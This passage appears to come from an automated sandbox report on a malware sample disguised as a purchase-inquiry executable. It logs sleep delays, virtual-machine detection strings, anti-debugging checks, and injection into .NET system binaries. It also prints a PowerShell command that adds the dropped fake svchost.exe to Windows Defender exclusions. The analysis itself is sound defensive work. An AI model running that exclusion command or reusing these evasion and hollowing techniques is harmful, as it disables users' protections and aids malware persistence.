                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99555
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98875
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598774
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99732
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98708
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97346
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96980
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96634
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96406
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96121
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96013
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95543
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95432
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593873
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99869
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99741
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99606
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99464
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99332
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99174
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99034
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96808
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96664
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96368
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95961
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95824
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95655
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95524
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95386
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95261
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94919
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94675
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94555
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599838
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599709
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599567
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599429
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599216
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599023
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598717
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99876
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99613
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99192
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99064
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98945
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98716
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98593
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98027
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97901
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97561
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97233
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96796
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95702
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99403
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99282
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98438
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.18.dr | Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware, Inc.
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.18.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.18.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.18.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: svchost.exe, 00000008.00000002.2008316470.000001A4FFF3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Amcache.hve.18.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: Amcache.hve.18.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                    Source: Amcache.hve.18.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: Amcache.hve.18.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Amcache.hve.18.dr | Binary or memory string: vmci.sys
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: Amcache.hve.18.dr | Binary or memory string: vmci.syshbin`
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: Amcache.hve.18.dr | Binary or memory string: \driver\vmci,\driver\pci
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.18.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware20,1
                    Source: Amcache.hve.18.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.18.dr | Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.18.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.18.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.18.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware PCI VMCI Bus Device
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.18.dr | Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.18.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VMwareVBox
                    Source: Amcache.hve.18.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_010A7EE0 CheckRemoteDebuggerPresent,15_2_010A7EE0
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8DE008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
